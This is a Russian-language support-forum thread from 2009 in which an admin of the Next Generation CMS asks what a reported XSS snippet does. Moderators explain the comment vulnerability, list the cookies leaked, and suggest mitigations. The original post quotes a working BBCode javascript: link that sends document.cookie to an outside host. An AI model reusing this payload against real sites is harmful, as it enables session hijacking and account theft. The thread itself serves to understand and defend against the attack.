РУССКИЙ
Русский English Deutsch Українська Қазақша

Next Generation CMS :: Форум поддержки

Заинтересовала наша система? Тогда этот форум для Вас!

Вы не вошли.

Страницы 1

#1 2009-06-11 19:12:02

Luca
Участник
Здесь с 2009-03-19
Сообщений: 398
Рейтинг :   

Что делает следующий код?

Мне тут сообщили что в движке есть дырка и прислали код

[url=javascript:location.replace("http://bestwebart.ru/a.php?"+document.cookie)]Мессага[/url]

Как я поинмаю эта штука ворует кукисы. верно? На сколько это опасно и как это исправить? Чем для меня как админа может вылиться переход по этой ссылке?

Отредактировано Luca (2009-06-11 19:12:17)

Вне форума

#2 2009-06-11 19:36:09

infinity237
Модератор
Откуда: Russia, Moscow
Здесь с 2008-11-09
Сообщений: 2,674
Рейтинг :   176 
Сайт

Re: Что делает следующий код?

1. В 0.9.0 Release действительно были свои активные XSS уязвимости, в комментариях, в SVN версии уже закрыты.
2. Если у тебя стоит "Автоурезание слов в комментариях" = 50, то код порежется и не обработается парсером.
3. В 0.9.0 Release, если ты перешёл по ссылке, то тебе лучше всего сменить пароль, т.к. ты в таком случае потенциально уязвим.
Скрипту отправляется инфа: PHPSESSID=сессия; zz_auth=cookie; com_username=логин; com_usermail=e-mail
Т.е. фактически можно расшифровать по cookie твой пароль.

P.S. Это называется php sniffer.

Отредактировано infinity237 (2009-06-11 19:38:49)

Вне форума

#3 2009-06-11 19:40:21

insider
Участник
Здесь с 2009-01-25
Сообщений: 229
Рейтинг :   35 
Сайт

Re: Что делает следующий код?

Пароль расшифровать нельзя, можно cookie подставить и зайти под сеансом админа
Нужно разлогиниться и залогиниться обратно, этого достаточно

Вне форума

#4 2009-06-11 19:45:39

infinity237
Модератор
Откуда: Russia, Moscow
Здесь с 2008-11-09
Сообщений: 2,674
Рейтинг :   176 
Сайт

Re: Что делает следующий код?

Пароль расшифровать нельзя

o_O

Можно объяснить почему это нельзя?

Вне форума

#5 2009-06-11 19:55:19

insider
Участник
Здесь с 2009-01-25
Сообщений: 229
Рейтинг :   35 
Сайт

Re: Что делает следующий код?

Хорошо, тогда расшифруй 6c1facadd7c364630508e7ee5756ad85
zz_auth -- идентификатор сессии, он же содержится в поле authcookie таблицы юзеров

Вне форума

#6 2009-06-11 20:04:15

infinity237
Модератор
Откуда: Russia, Moscow
Здесь с 2008-11-09
Сообщений: 2,674
Рейтинг :   176 
Сайт

Re: Что делает следующий код?

Прошу прощения, действительно был не прав...
Всё сделано по-хитрожопому... )

Вне форума

#7 2009-06-11 20:11:55

Luca
Участник
Здесь с 2009-03-19
Сообщений: 398
Рейтинг :   

Re: Что делает следующий код?

А что дает автоурезание слов? Оно кукисы на выходе порежет? Просто в CMS есть баг из-за которого длинные ссылки дать нельзя -они урезаются "урезателем длинных слов", так что приходится ставить максимальную длинну слова в несколько сотен символов.

Вне форума

#8 2009-06-11 20:39:17

infinity237
Модератор
Откуда: Russia, Moscow
Здесь с 2008-11-09
Сообщений: 2,674
Рейтинг :   176 
Сайт

Re: Что делает следующий код?

автоурезание как раз и не даёт таким ссылкам пройти...

Вне форума

#9 2010-01-27 05:30:03

mittus
Участник
Здесь с 2010-01-24
Сообщений: 155
Рейтинг :   

Re: Что делает следующий код?

Luca пишет:

А что дает автоурезание слов? Оно кукисы на выходе порежет? Просто в CMS есть баг из-за которого длинные ссылки дать нельзя -они урезаются "урезателем длинных слов", так что приходится ставить максимальную длинну слова в несколько сотен символов.

Лучше на 20 поставить, ссылочки в комментариях не так важны, как безопасность. При желании можно и поудалять пробельчики, если нужно перейти по ссылке :)

Вне форума

Страницы 1

Сейчас в этой теме пользователей: 0, гостей: 1
[Bot] ClaudeBot

Подвал форума

Под управлением FluxBB 1.5.11
Модифицировал Visman

[ Сгенерировано за 0.011 сек, 7 запросов выполнено - Использовано памяти: 540.24 Кбайт (Пик: 561.24 Кбайт) ]